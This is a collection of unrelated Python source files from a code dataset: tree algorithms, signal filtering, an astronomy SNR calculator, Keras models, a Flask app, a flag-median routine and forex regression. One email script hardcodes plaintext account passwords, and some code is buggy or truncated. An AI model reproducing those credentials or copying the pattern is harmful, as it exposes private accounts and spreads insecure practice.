pass\n\n","sub_path":"scripts/left_side_error_v1.py","file_name":"left_side_error_v1.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"92940571","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 31 12:30:58 2018\n\n@author: Saul\n\"\"\"\n\n# -*- coding:utf-8 -*-\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nclass Solution:\n # 返回对应节点TreeNode\n def __init__(self):\n self.orderres = []\n\n def Inorder(self, pRoot):\n if not pRoot:\n return\n self.Inorder(pRoot.left)\n self.orderres.append(pRoot)\n self.Inorder(pRoot.right)\n \n def KthNode(self, pRoot, k):\n # write code here\n if not pRoot or k <= 0:\n return None\n self.Inorder(pRoot)\n if k > len(self.orderres):\n return None\n return self.orderres[k-1]","sub_path":"comeonoffer/二叉搜索树的第k大结点.py","file_name":"二叉搜索树的第k大结点.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"40092901","text":"import time\nfrom datetime import date\n\n\noptionArr = {\n\t\"one-million\": 1000000,\n\t\"five-million\": 5000000,\n\t\"ten-million\": 10000000,\n\t\"one-billion\": 1000000000,\n\t\"five-billion\": 5000000000,\n\t\"ten-billion\": 10000000000\n};\n\noption = 0;\n\ndef setup():\n\toption = input(\"\"\"Please enter an option?\n\"\"\")\n\toptionArrIndexes = [\"one-million\", \"five-million\", \"ten-million\", \"hundred-million\", \"one-billion\", \"ten-billion\"]\n\tif option in optionArrIndexes:\n\t\treturn optionArr[option]\n\telse:\n\t\tprint(\"Invalid Argument passed. Allowed values are one-thousand|one-million|ten-million|one-billion|ten-billion\")\n\t\texit()\n","sub_path":"python/loops/multitasking/commonvalidator.py","file_name":"commonvalidator.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"592854466","text":"#\n# Copyright © 2020 United States Government as represented by the Administrator\n# of the National Aeronautics and Space Administration. No copyright is claimed\n# in the United States under Title 17, U.S. Code. All Other Rights Reserved.\n#\n# SPDX-License-Identifier: NASA-1.3\n#\n\"\"\"Dorado sensitivity calculator\"\"\"\nfrom astropy.stats import signal_to_noise_oir_ccd\nfrom astropy import units as u\nimport numpy as np\nfrom synphot.exceptions import SynphotError\nfrom synphot import Observation\n\nfrom . import backgrounds\nfrom . import bandpasses\nfrom . import constants\n\n__all__ = ('get_snr', 'get_limmag', 'get_exptime')\n\n\ndef _get_count_rate(source_spectrum):\n observation = Observation(source_spectrum, bandpasses.NUV_D)\n try:\n return observation.countrate(constants.AREA) / u.ct\n except SynphotError as e:\n if e.args[0] == 'Integrated flux is infinite':\n return np.inf * u.s**-1\n else:\n raise\n\n\ndef get_snr(source_spectrum, *, exptime, coord, time, night):\n \"\"\"Calculate the SNR of an observation of a point source with Dorado.\n\n Parameters\n ----------\n source_spectrum : synphot.SourceSpectrum\n The spectrum of the source.\n exptime : astropy.units.Quantity\n The exposure time\n coord : astropy.coordinates.SkyCoord\n The coordinates of the source, for calculating zodiacal light\n time : astropy.time.Time\n The time of the observation, for calculating zodiacal light\n night : bool\n Whether the observation occurs on the day or night side of the Earth,\n for estimating airglow\n\n Returns\n -------\n float\n The signal to noise ratio\n \"\"\"\n return signal_to_noise_oir_ccd(\n exptime,\n constants.APERTURE_CORRECTION * _get_count_rate(source_spectrum),\n (\n _get_count_rate(backgrounds.get_zodiacal_light(coord, time)) +\n _get_count_rate(backgrounds.get_airglow(night))\n ),\n constants.DARK_NOISE,\n constants.READ_NOISE,\n constants.NPIX\n ).to_value(u.dimensionless_unscaled)\n\n\ndef _amp_for_signal_to_noise_oir_ccd(\n snr, t, source_eps, sky_eps, dark_eps, rd, npix, gain=1.0):\n \"\"\"Inverse of astropy.stats.signal_to_noise_oir_ccd.\"\"\"\n signal = t * source_eps * gain\n # noise squared without signal shot noise term\n snr2 = np.square(snr)\n noise2 = t * (npix * (sky_eps * gain + dark_eps)) + npix * np.square(rd)\n return 0.5 * snr2 / signal * (1 + np.sqrt(1 + 4 * noise2 / snr2))\n\n\ndef get_limmag(source_spectrum, *, snr, exptime, coord, time, night):\n \"\"\"Get the limiting magnitude for a given SNR.\n\n Parameters\n ----------\n source_spectrum : synphot.SourceSpectrum\n The spectrum of the source.\n snr : float\n The desired SNR.\n exptime : astropy.units.Quantity\n The exposure time\n coord : astropy.coordinates.SkyCoord\n The coordinates of the source, for calculating zodiacal light\n time : astropy.time.Time\n The time of the observation, for calculating zodiacal light\n night : bool\n Whether the observation occurs on the day or night side of the Earth,\n for estimating airglow\n\n Returns\n -------\n astropy.units.Quantity\n The AB magnitude of the source\n \"\"\"\n mag0 = Observation(source_spectrum, bandpasses.NUV_D).effstim(\n u.ABmag, area=constants.AREA)\n\n result = _amp_for_signal_to_noise_oir_ccd(\n snr,\n exptime,\n constants.APERTURE_CORRECTION * _get_count_rate(source_spectrum),\n (\n _get_count_rate(backgrounds.get_zodiacal_light(coord, time)) +\n _get_count_rate(backgrounds.get_airglow(night))\n ),\n constants.DARK_NOISE,\n constants.READ_NOISE,\n constants.NPIX\n ).to_value(u.dimensionless_unscaled)\n\n return -2.5 * np.log10(result) * u.mag + mag0\n\n\ndef _exptime_for_signal_to_noise_oir_ccd(\n snr, source_eps, sky_eps, dark_eps, rd, npix, gain=1.0):\n \"\"\"Inverse of astropy.stats.signal_to_noise_oir_ccd.\"\"\"\n c1 = source_eps * gain\n c2 = npix * (sky_eps * gain + dark_eps)\n c3 = npix * np.square(rd)\n x = 1 + c2 / c1\n snr2 = np.square(snr)\n return 0.5 * snr2 / c1 * (x + np.sqrt(np.square(x) + 4 * c3 / snr2))\n\n\ndef get_exptime(source_spectrum, *, snr, coord, time, night):\n \"\"\"Calculate the SNR of an observation of a point source with Dorado.\n\n Parameters\n ----------\n source_spectrum : synphot.SourceSpectrum\n The spectrum of the source.\n snr : float\n The signal to noise ratio\n coord : astropy.coordinates.SkyCoord\n The coordinates of the source, for calculating zodiacal light\n time : astropy.time.Time\n The time of the observation, for calculating zodiacal light\n night : bool\n Whether the observation occurs on the day or night side of the Earth,\n for estimating airglow\n\n Returns\n -------\n astropy.units.Quantity\n The exposure time\n \"\"\"\n return _exptime_for_signal_to_noise_oir_ccd(\n snr,\n constants.APERTURE_CORRECTION * _get_count_rate(source_spectrum),\n (\n _get_count_rate(backgrounds.get_zodiacal_light(coord, time)) +\n _get_count_rate(backgrounds.get_airglow(night))\n ),\n constants.DARK_NOISE,\n constants.READ_NOISE,\n constants.NPIX\n )\n","sub_path":"dorado/sensitivity/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"332683654","text":"import struct\n\n# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport numpy as np\nimport scipy.signal as signal\n\n# IIR2Filter comes from https://github.com/poganyg/IIR-filter\n\n\nclass IIR2Filter(object):\n\n def createCoeffs(self, order, cutoff, filterType, design='butter', rp=1, rs=1, fs=0):\n\n # defining the acceptable inputs for the design and filterType params\n self.designs = ['butter', 'cheby1', 'cheby2']\n self.filterTypes1 = ['lowpass', 'highpass', 'Lowpass', 'Highpass', 'low', 'high']\n self.filterTypes2 = ['bandstop', 'bandpass', 'Bandstop', 'Bandpass']\n\n # Error handling: other errors can arise too, but those are dealt with\n # in the signal package.\n self.isThereAnError = 1 # if there was no error then it will be set to 0\n self.COEFFS = [0] # with no error this will hold the coefficients\n\n if design not in self.designs:\n print('Gave wrong filter design! Remember: butter, cheby1, cheby2.')\n elif filterType not in self.filterTypes1 and filterType not in self.filterTypes2:\n print('Gave wrong filter type! Remember: lowpass, highpass',\n ', bandpass, bandstop.')\n elif fs < 0:\n print('The sampling frequency has to be positive!')\n else:\n self.isThereAnError = 0\n\n # if fs was given then the given cutoffs need to be normalised to Nyquist\n if fs and self.isThereAnError == 0:\n for i in range(len(cutoff)):\n cutoff[i] = cutoff[i] / fs * 2\n\n if design == 'butter' and self.isThereAnError == 0:\n self.COEFFS = signal.butter(order, cutoff, filterType, output='sos')\n elif design == 'cheby1' and self.isThereAnError == 0:\n self.COEFFS = signal.cheby1(order, rp, cutoff, filterType, output='sos')\n elif design == 'cheby2' and self.isThereAnError == 0:\n self.COEFFS = signal.cheby2(order, rs, cutoff, filterType, output='sos')\n\n return self.COEFFS\n\n def __init__(self, order, cutoff, filterType, design='butter', rp=1, rs=1, fs=0):\n self.COEFFS = self.createCoeffs(order, cutoff, filterType, design, rp, rs, fs)\n self.acc_input = np.zeros(len(self.COEFFS))\n self.acc_output = np.zeros(len(self.COEFFS))\n self.buffer1 = np.zeros(len(self.COEFFS))\n self.buffer2 = np.zeros(len(self.COEFFS))\n self.input = 0\n self.output = 0\n\n def filter(self, input):\n\n # len(COEFFS[0,:] == 1 means that there was an error in the generation\n # of the coefficients and the filtering should not be used\n if len(self.COEFFS[0, :]) > 1:\n\n self.input = input\n self.output = 0\n\n # The for loop creates a chain of second order filters according to\n # the order desired. If a 10th order filter is to be created the\n # loop will iterate 5 times to create a chain of 5 second order\n # filters.\n for i in range(len(self.COEFFS)):\n self.FIRCOEFFS = self.COEFFS[i][0:3]\n self.IIRCOEFFS = self.COEFFS[i][3:6]\n\n # Calculating the accumulated input consisting of the input and\n # the values coming from the feedbaack loops (delay buffers\n # weighed by the IIR coefficients).\n self.acc_input[i] = (self.input + self.buffer1[i]\n * -self.IIRCOEFFS[1] + self.buffer2[i] * -self.IIRCOEFFS[2])\n\n # Calculating the accumulated output provided by the accumulated\n # input and the values from the delay bufferes weighed by the\n # FIR coefficients.\n self.acc_output[i] = (self.acc_input[i] * self.FIRCOEFFS[0]\n + self.buffer1[i] * self.FIRCOEFFS[1] + self.buffer2[i]\n * self.FIRCOEFFS[2])\n\n # Shifting the values on the delay line: acc_input->buffer1->\n # buffer2\n self.buffer2[i] = self.buffer1[i]\n self.buffer1[i] = self.acc_input[i]\n\n self.input = self.acc_output[i]\n\n self.output = self.acc_output[i]\n\n return self.output\n\n\nclass RealTimeProcessor(object):\n def __init__(self, time_step):\n self.time_step = time_step\n\n self.X = 0.0\n self.Y = 0.0\n self.Z = 0.0\n\n self.X_d = 0.0\n self.Y_d = 0.0\n self.Z_d = 0.0\n\n self.diff_X = Differentiator()\n self.diff_Y = Differentiator()\n self.diff_Z = Differentiator()\n\n self.QX = 0.0\n self.QY = 0.0\n self.QZ = 0.0\n self.QW = 1.0\n self.R11 = 1.0\n self.R12 = 0.0\n self.R13 = 0.0\n self.R21 = 0.0\n self.R22 = 1.0\n self.R23 = 0.0\n self.R31 = 0.0\n self.R32 = 0.0\n self.R33 = 1.0\n\n def step(self, udp_data):\n x, y, z, qx, qy, qz, qw = struct.unpack(\"hhhhhhh\", udp_data)\n # position\n self.X = x * 0.0005\n self.Y = y * 0.0005\n self.Z = z * 0.0005\n # velocity\n self.X_d = self.diff_X.step(self.X, self.time_step)\n self.Y_d = self.diff_Y.step(self.Y, self.time_step)\n self.Z_d = self.diff_Z.step(self.Z, self.time_step)\n # qaut\n self.QX = float(qx * 0.001)\n self.QY = float(qy * 0.001)\n self.QZ = float(qz * 0.001)\n self.QW = float(qw * 0.001)\n # qaut2rotm\n yy = self.QY * self.QY\n xx = self.QX * self.QX\n zz = self.QZ * self.QZ\n xy = self.QX * self.QY\n xz = self.QX * self.QZ\n yz = self.QY * self.QZ\n wx = self.QW * self.QX\n wy = self.QW * self.QY\n wz = self.QW * self.QZ\n self.R11 = 1 - 2 * (yy + zz)\n self.R12 = 2 * (xy - wz)\n self.R13 = 2 * (xz + wy)\n self.R21 = 2 * (xy + wz)\n self.R22 = 1 - 2 * (xx + zz)\n self.R23 = 2 * (yz - wx)\n self.R31 = 2 * (xz - wy)\n self.R32 = 2 * (yz + wx)\n self.R33 = 1 - 2 * (xx + yy)\n\n\nclass Differentiator(object):\n def __init__(self, data_delayed=0):\n self.data_delayed = data_delayed\n\n def step(self, data, time_step):\n temp_data_d = (data - self.data_delayed)/time_step\n self.data_delayed = data\n return temp_data_d\n","sub_path":"data_processor/GeneralFcn_2.py","file_name":"GeneralFcn_2.py","file_ext":"py","file_size_in_byte":6338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"384750513","text":"import numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Activation, LSTM, Dense, BatchNormalization\r\nfrom keras.optimizers import sgd\r\nfrom keras.optimizers import Adam, nadam\r\nfrom keras.engine.input_layer import Input\r\nfrom keras import initializers, regularizers, constraints\r\nfrom keras.engine.topology import Layer\r\nfrom keras import optimizers\r\nfrom keras import backend as K\r\nfrom keras.layers import Dropout\r\nfrom keras.layers import Dense\r\nfrom keras import losses\r\n\r\nclass PolicyNetwork:\r\n def __init__(self, input_dim=0, output_dim=0, lr=0.01):\r\n self.input_dim = input_dim\r\n self.lr = lr\r\n # LSTM 신경망\r\n self.model = Sequential()\r\n\r\n self.model.add(LSTM(128, input_shape=(1, input_dim), return_sequences=True, stateful=False, dropout=0.5, activation='relu'))\r\n self.model.add(BatchNormalization())\r\n self.model.add(Attention(1)) ### ATTENTION\r\n self.model.add(Dense(32, activation='relu'))\r\n self.model.add(Dropout(0.5))\r\n self.model.add(Dense(2, activation=\"softmax\"))\r\n\r\n #self.model.compile(optimizer=Adam(lr=lr), loss='mse')\r\n nadam = optimizers.nadam(lr=0.01, beta_1=0.9, beta_2=0.999)\r\n self.model.compile(loss='mean_squared_error', optimizer=nadam)\r\n #self.model.compile(optimizer=Adam(lr=lr,beta_1=0.9, beta_2=0.999, amsgrad=True), loss='mse')\r\n\r\n\r\n self.prob = None\r\n\r\n def reset(self):\r\n self.prob = None\r\n\r\n def predict(self, sample):\r\n self.prob = self.model.predict(np.array(sample).reshape((1, -1, self.input_dim)))[0]\r\n return self.prob\r\n\r\n def train_on_batch(self, x, y):\r\n return self.model.train_on_batch(x, y)\r\n\r\n def save_model(self, model_path):\r\n if model_path is not None and self.model is not None:\r\n self.model.save_weights(model_path, overwrite=True)\r\n\r\n def load_model(self, model_path):\r\n if model_path is not None:\r\n self.model.load_weights(model_path)\r\n\r\n\r\nclass PolicyNetwork1: #### 원래 모델\r\n def __init__(self, input_dim=0, output_dim=0, lr=0.01):\r\n self.input_dim = input_dim\r\n self.lr = lr\r\n\r\n # LSTM 신경망\r\n self.model = Sequential()\r\n\r\n self.model.add(LSTM(256, input_shape=(1, input_dim),\r\n return_sequences=True, stateful=False, dropout=0.5))\r\n self.model.add(BatchNormalization())\r\n self.model.add(LSTM(256, return_sequences=True, stateful=False, dropout=0.5))\r\n self.model.add(BatchNormalization())\r\n self.model.add(LSTM(256, return_sequences=False, stateful=False, dropout=0.5))\r\n self.model.add(BatchNormalization())\r\n self.model.add(Dense(output_dim))\r\n self.model.add(Activation('sigmoid'))\r\n #self.model.compile(optimizer=Adam(lr=lr), loss='mse')\r\n adam = optimizers.nadam(lr=0.01, beta_1=0.9, beta_2=0.999)\r\n self.model.compile(loss='mean_squared_error', optimizer=adam)\r\n #self.model.compile(optimizer=Adam(lr=lr,beta_1=0.9, beta_2=0.999, amsgrad=True), loss='mse')\r\n\r\n\r\n self.prob = None\r\n\r\n def reset(self):\r\n self.prob = None\r\n\r\n def predict(self, sample):\r\n self.prob = self.model.predict(np.array(sample).reshape((1, -1, self.input_dim)))[0]\r\n return self.prob\r\n\r\n def train_on_batch(self, x, y):\r\n return self.model.train_on_batch(x, y)\r\n\r\n def save_model(self, model_path):\r\n if model_path is not None and self.model is not None:\r\n self.model.save_weights(model_path, overwrite=True)\r\n\r\n def load_model(self, model_path):\r\n if model_path is not None:\r\n self.model.load_weights(model_path)\r\n\r\n\r\n\r\n# https://www.kaggle.com/qqgeogor/keras-lstm-attention-glove840b-lb-0-043\r\nclass Attention(Layer):\r\n def __init__(self, step_dim,\r\n W_regularizer=None, b_regularizer=None,\r\n W_constraint=None, b_constraint=None,\r\n bias=True, **kwargs):\r\n self.supports_masking = True\r\n self.init = initializers.get('glorot_uniform')\r\n\r\n self.W_regularizer = regularizers.get(W_regularizer)\r\n self.b_regularizer = regularizers.get(b_regularizer)\r\n\r\n self.W_constraint = constraints.get(W_constraint)\r\n self.b_constraint = constraints.get(b_constraint)\r\n\r\n self.bias = bias\r\n self.step_dim = step_dim\r\n self.features_dim = 0\r\n super(Attention, self).__init__(**kwargs)\r\n\r\n def build(self, input_shape):\r\n assert len(input_shape) == 3\r\n\r\n self.W = self.add_weight((input_shape[-1],),\r\n initializer=self.init,\r\n name='{}_W'.format(self.name),\r\n regularizer=self.W_regularizer,\r\n constraint=self.W_constraint)\r\n self.features_dim = input_shape[-1]\r\n\r\n if self.bias:\r\n self.b = self.add_weight((input_shape[1],),\r\n initializer='zero',\r\n name='{}_b'.format(self.name),\r\n regularizer=self.b_regularizer,\r\n constraint=self.b_constraint)\r\n else:\r\n self.b = None\r\n\r\n self.built = True\r\n\r\n def compute_mask(self, input, input_mask=None):\r\n return None\r\n\r\n def call(self, x, mask=None):\r\n features_dim = self.features_dim\r\n step_dim = self.step_dim\r\n\r\n eij = K.reshape(K.dot(K.reshape(x, (-1, features_dim)),\r\n K.reshape(self.W, (features_dim, 1))), (-1, step_dim))\r\n\r\n if self.bias:\r\n eij += self.b\r\n\r\n eij = K.tanh(eij)\r\n\r\n a = K.exp(eij)\r\n\r\n if mask is not None:\r\n a *= K.cast(mask, K.floatx())\r\n\r\n a /= K.cast(K.sum(a, axis=1, keepdims=True) + K.epsilon(), K.floatx())\r\n\r\n a = K.expand_dims(a)\r\n weighted_input = x * a\r\n return K.sum(weighted_input, axis=1)\r\n\r\n def compute_output_shape(self, input_shape):\r\n return input_shape[0], self.features_dim","sub_path":"policy_network.py","file_name":"policy_network.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"16799930","text":"#!/usr/bin/python3\n\"\"\" Starts a Flask web application \"\"\"\nfrom flask import Flask, render_template\nfrom models import storage\nfrom models.state import State\n\n\napp = Flask(__name__)\n\n\n@app.teardown_appcontext\ndef teardown_session(exception):\n \"\"\" Removes the current SQLAlchemy Session \"\"\"\n storage.close()\n\n\n@app.route('/states_list', strict_slashes=False)\ndef display_html():\n \"\"\" Function called with /states_list route \"\"\"\n states = storage.all(State)\n dic_obj = {value.id: value.name for value in states.values()}\n return render_template('7-states_list.html', items=dic_obj)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000)\n","sub_path":"web_flask/7-states_list.py","file_name":"7-states_list.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"225988127","text":"from setuptools import setup, find_packages\nfrom codecs import open\nfrom os import path\n\n__version__ = '1.0.0'\n\n\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, 'requirements.txt'), encoding='utf-8') as f:\n all_reqs = f.read().split('\\n')\ninstall_requires = [x.strip() for x in all_reqs if 'git+' not in x]\ndependency_links = [x.strip().replace('git+', '') for x in all_reqs if x.startswith('git+')]\n\n\nsetup(\n name='download_pokemon',\n version=__version__,\n description=\"Python Script to download hundreds of pokemon from 'Google Images'. It is a ready-to-run code! \",\n url='https://github.com/joe-davidson1802/poke-detect',\n license='MIT',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.6',\n ],\n keywords='pokemon machine-learning ml neural-network image-search image-dataset image-scrapper image-gallery terminal command-line',\n packages=find_packages(exclude=['docs', 'tests*']),\n include_package_data=True,\n author='Joe Davidson',\n install_requires=install_requires,\n dependency_links=dependency_links,\n author_email='joe.davidson2111@hotmail.com',\n entry_points={\n 'console_scripts': [\n 'download_pokemon = download_pokemon:main'\n ]},\n\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"555866062","text":"import numpy as np\nimport flag_mean #\nimport distances #\n\n'''\n-maybe dont use squared error for convergence criteria\n\n'''\n\n\ndef flag_median(X, eps, r, init = 'random', s_vals = False):\n #nate changed this\n\n if type(X) != list or len(X) == 0:\n return X\n \n medn = True \n # X a list of subspaces, r desired dimension\n m = len(X)\n\n #initialize median\n if init == 'random':\n #randomly\n n = X[0].shape[0]\n Y_raw = np.random.rand(n,r)\n Y0 = np.linalg.qr(Y_raw)[0]\n else:\n #flag mean\n Y0 = flag_mean.flag_mean(X,r)\n\n i=0\n alph = []\n aX = []\n err = []\n al = []\n for j in range(m):\n al.append((r-np.trace(np.dot(np.dot(Y0.transpose(),X[j]),np.dot(X[j].transpose(),Y0))))**(-1/4))\n aX.append(al[j]*X[j])\n alph.append(al)\n Y1 = flag_mean.flag_mean(aX,r)\n err.append(distances.chordal_distance(Y0,Y1,medn))\n i += 1\n err.append(1)\n\n while err[i-1] > eps:\n aX = []\n al = []\n for j in range(m):\n al.append((r-np.trace(np.dot(np.dot(Y1.transpose(),X[j]),np.dot(X[j].transpose(),Y1))))**(-1/4))\n aX.append(al[j]*X[j])\n alph.append(al)\n Y0 = Y1\n Y1 = flag_mean.flag_mean(aX,r)\n err.append(distances.chordal_distance(Y0,Y1,medn))\n cauch = err[i-1]-err[i]\n i += 1\n\n\n if cauch < 0:\n Y1 = Y0\n print('Last iteration of flag meadian increased error!')\n\n if s_vals:\n S = flag_mean.flag_mean(aX,r,s_vals)\n return S\n else:\n return Y1\n\n\n","sub_path":"python_code/flag_median.py","file_name":"flag_median.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"328875847","text":"import os\nos.chdir(\"../../\")\nimport import_folders\n\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport CTimeData as CTD\nimport copy as copy\nimport utilities_lib as ul\nfrom graph_lib import gl\nimport DDBB_lib as DBl\n\nimport Cemail\n\nplt.close(\"all\")\n\n######## SELECT SOURCE ########\ndataSource = \"GCI\" # Hanseatic FxPro GCI Yahoo\n[storage_folder, info_folder, \n updates_folder] = ul.get_foldersData(source = dataSource)\nfolder_images = \"../pics/gl/\"\n######## SELECT SYMBOLS AND PERIODS ########\nsymbols = [\"XAUUSD\",\"Mad.ITX\", \"EURUSD\"]\nsymbols = [\"Alcoa_Inc\"]\nsymbols = [\"Amazon\", \"Alcoa_Inc\"]\nperiods = [15]\n\n######## SELECT DATE LIMITS ###########\nsdate = dt.datetime.strptime(\"21-11-2016\", \"%d-%m-%Y\")\nedate = dt.datetime.strptime(\"25-11-2016\", \"%d-%m-%Y\")\n######## CREATE THE OBJECT AND LOAD THE DATA ##########\n# Tell which company and which period we want\ntimeData = CTD.CTimeData(symbols[0],periods[0])\nTD = DBl.load_TD_from_csv(storage_folder, symbols[1],periods[0])\ntimeData.set_csv(storage_folder) # Load the data into the model\ntimeData.set_TD(TD)\n############## Obtain time series ###########################\nprice = timeData.get_timeSeries([\"Close\", \"Average\"]);\n############# Plot time Series and save it to disk #########\ngl.plot([],price)\n\ndatafolder = \"../maildata/\"\n\npicdir = datafolder + \"pene.png\"\ngl.savefig(picdir)\n\n###########################################################################\n############## BASIC PLOTING FUNC #########################################\n###########################################################################\n\nuser = \"esopo.goldchick@gmail.com\"\npwd = \"Goldenegg\"\n\n#user = \"manuwhs@gmail.com\"\n#pwd = \"manumon7g.@\"\n\nrecipient = \"manuwhs@gmail.com\"\n#recipient = \"tsarmarianthi@gmail.com\"\n\nsubject = \"[Trapyng] Update %s\" % (\"penesd\")\n\nbody = \"Look at this super interesting stuff !!\"\n\nmyMail = Cemail.Cemail(user,pwd,recipient)\nmyMail.create_msgRoot(subject = subject)\n#myMail.set_subject(subject) # For some reason we can only initilize the Subject\nmyMail.add_HTML(body)\n\n## Add some HMTL\nfd = open(datafolder + \"index.html\")\ncaca = fd.read()\nfd.close\nmyMail.add_HTML(caca)\n\nmyMail.add_image(filedir = picdir, inline = 0)\nmyMail.add_image(filedir = picdir, inline = 1)\n\nmyMail.add_file(datafolder + \"Email_main.py\")\nmyMail.add_file(datafolder + \"main.pdf\")\n\nmyMail.add_HTML(\"

    Fuck you


    \")\nmyMail.add_HTML(\"Hello my friend\")\n########## YOU MAY HAVE TO ACTIVATE THE USED OF UNTRUSTFUL APPS IN GMAIL #####\nmyMail.send_email()\n","sub_path":"Examples/email/3. Email_main.py","file_name":"3. Email_main.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"557684703","text":"from django.core.management.base import BaseCommand, CommandError\nfrom base.models import Channels\n\nimport requests\n\nclass Command(BaseCommand):\n\tdef handle(self, *args, **options):\n\t\tr = requests.get('https://atlas.metabroadcast.com/3.0/channel_groups/cbg4.json?annotations=channels')\n\t\tchannel_groups = r.json()['channel_groups'][0]\n\t\tfor channel in channel_groups['channels']:\n\t\t\tChannels.objects.get_or_create(\n\t\t\t\ttitle=channel['channel']['title'],\n\t\t\t\tchannel_id=channel['channel']['id']\n\t\t\t)","sub_path":"base/management/commands/channels.py","file_name":"channels.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"266342326","text":"#Importing the libraries\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.svm import SVR\nfrom sklearn.model_selection import GridSearchCV, KFold\n\n#Getting the data and setting the index in date time format\n\ndataset = pd.read_csv(\"Classification GITHUB data.csv\")\ndataset['Date'] = pd.to_datetime(dataset['Date'])\ndataset = dataset.set_index('Date')\n\n\n#Creating the additional differential columns\n\ndata = dataset.iloc[1826:, 0:]\ndata['Interest Differential'] = data['Turkey Interest Rate'] - data['US Interest Rate']\ndata['Turkey Public Debt '] = data['Turkey Public Debt ']/1000\ndata['Turkey Public Debt'] = data['Turkey Public Debt ']\ndata['Growth Rate Differential'] = data['Turkey GDP Growth Rate'] - data['US GDP Growth Rate']\n\n\n#Picking out the relevant columns\n\nX = data.iloc[:, [5, 6, 10, 13, 14, 15]].values\ny = data.iloc[:, [0]].values\n\n\n#Function to average column values over given intervals\n\ndef chunk_it_up(array, n):\n \n size = np.shape(array)\n rows = size[0]\n columns = size[1]\n \n largest = int(rows/n)\n remainder = rows%n\n \n avg_matrix = np.zeros([largest, columns])\n \n for i in range(largest):\n for j in range(columns):\n avg_matrix[i][j] = np.mean(array[(i*n):(i*n+n), j])\n \n rem_matrix = []\n \n if remainder > 0:\n for j in range(columns):\n rem_matrix.append(np.mean(array[(largest*n):, j]))\n \n rem_matrix = np.reshape(rem_matrix, [1, len(rem_matrix)])\n \n avg_matrix = np.append(avg_matrix, rem_matrix, axis = 0)\n \n \n return avg_matrix\n\n\n#Taking the weekly averages\n\nX_5 = chunk_it_up(X, 5)\ny_5 = chunk_it_up(y, 5)\n\n\n#Standardising variables is important here for support vector regression\n\nstd = np.std(y_7)\nmean = np.mean(y_7)\n\nX_7_std = (X_7 - np.mean(X_7))/np.std(X_7)\ny_7_std = (y_7 - mean)/std\n\n\n#Roll it up one place\n\ny_7_std_2 = np.roll(y_7_std, -1)\ny_7_2 = np.roll(y_7, -1)\n\n\n#Splitting into the training and test sets for the weekly average analysis\n\nX_train_1 = X_7_std[0:-2, :]\nX_test_1 = X_7_std[-2:-1, :]\ny_train_1 = y_7_std_2[0:-2, :]\ny_test_1 = y_7_2[-2:-1, :]\n\n\nX_train_2 = X_7_std[0:-3, :]\nX_test_2 = X_7_std[-3:-1, :]\ny_train_2 = y_7_std_2[0:-3:, :]\ny_test_2 = y_7_2[-3:-1, :]\n\n\nX_train_4 = X_7_std[0:-5, :]\nX_test_4 = X_7_std[-5:-1, :]\ny_train_4 = y_7_std_2[0:-5:, :]\ny_test_4 = y_7_2[-5:-1, :]\n\n\nX_train_12 = X_7_std[0:-13, :]\nX_test_12 = X_7_std[-13:-1, :]\ny_train_12 = y_7_std_2[0:-13:, :]\ny_test_12 = y_7_2[-13:-1, :]\n\n\n\n#Defining some output functions\n\n#Function for calculating the MAPE\n\ndef get_my_mape(array_pred, array_real):\n mid_1 = []\n for i in range(len(array_pred)):\n mid_1.append((array_pred[i] - array_real[i])/array_real[i]*100)\n mid_1_abs = [np.abs(mid_1[i]) for i in range(len(mid_1))]\n output = sum(mid_1_abs)/len(mid_1)\n return output\n\n#Function for performing weekly average analysis\n\ndef lets_evaluate(classifier):\n classifier.fit(X_train_1, y_train_1)\n pred_for_1 = classifier.predict(X_test_1)\n pred_for_1_og = pred_for_1*std + mean\n mape_for_1 = get_my_mape(pred_for_1_og, y_test_1)\n \n classifier.fit(X_train_2, y_train_2)\n pred_for_2 = classifier.predict(X_test_2)\n pred_for_2_og = pred_for_2*std + mean\n mape_for_2 = get_my_mape(pred_for_2_og, y_test_2)\n \n classifier.fit(X_train_4, y_train_4)\n pred_for_4 = classifier.predict(X_test_4)\n pred_for_4_og = pred_for_4*std + mean\n mape_for_4 = get_my_mape(pred_for_4_og, y_test_4)\n \n classifier.fit(X_train_12, y_train_12)\n pred_for_12 = classifier.predict(X_test_12)\n pred_for_12_og = pred_for_12*std + mean\n mape_for_12 = get_my_mape(pred_for_12_og, y_test_12)\n \n \n output_dict = {\n 'MAPE 